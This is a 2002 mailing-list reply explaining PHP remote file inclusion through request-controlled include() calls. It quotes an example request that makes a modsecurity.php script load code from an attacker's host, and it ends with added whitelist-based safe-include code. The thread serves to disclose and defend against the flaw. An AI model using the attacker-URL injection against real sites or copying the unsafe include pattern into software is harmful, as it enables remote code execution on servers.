Just as a side note, quite a lot of sites are open to this kind of attack, namely including files from other servers. fopen_wrappers and unsafe programming are to blame here.

Lots of scripts do

    include($file); // $file is in GPC

So if $file is "http://www.cracker.com/somefile.php", that file gets included, and the PHP code in it gets executed.

Easy workaround: disable fopen_wrappers in php.ini, or call file_exists before including any file.

    if (file_exists($file)) include($file);

Of course, the only "real" way to fix the bug is to program safely.

On 9/23/2002 1:53 AM Tim Vandermeersch wrote:

> If someone requests a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he
> wants.
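
One way to "program safely" in the sense of the reply above, as an added example that is not part of the original post or thread: the request supplies only a key that is looked up in a fixed table, never a path or URL. The table keys, the htmlfooter.php name and the temporary demo directory are assumptions, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not code from the original post. Requires PHP 7.1+.
// The keys and the htmlfooter.php name are hypothetical.

// Request value => file name on disk. The request never supplies a path or URL.
const ALLOWED_INCLUDES = [
    'header' => 'htmlheader.php',
    'footer' => 'htmlfooter.php',
];

/**
 * Map a request-supplied key to an absolute path inside $baseDir,
 * or return null if the key is unknown or the file is not there.
 */
function resolve_include(string $baseDir, string $key): ?string
{
    if (!array_key_exists($key, ALLOWED_INCLUDES)) {
        return null;                       // URLs and raw file names end here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_INCLUDES[$key]);
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    // Defence in depth: the resolved file must still be under $baseDir
    // (catches a symlink that points elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo with constructed data: a temporary include directory holding one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'htmlheader.php',
    '<?php echo "header included\n";');

foreach (['header', 'footer', 'http://MYBOX/', 'htmlheader.php'] as $input) {
    $path = resolve_include($dir, $input);
    if ($path === null) {
        echo "rejected: $input\n";         // unknown key, or file not present
    } else {
        echo "including for '$input': ";
        include $path;
    }
}

unlink($dir . DIRECTORY_SEPARATOR . 'htmlheader.php');
rmdir($dir);
```

Only `header` is included in the demo: `footer` is a known key whose file is absent, and the URL and the raw file name are not keys at all.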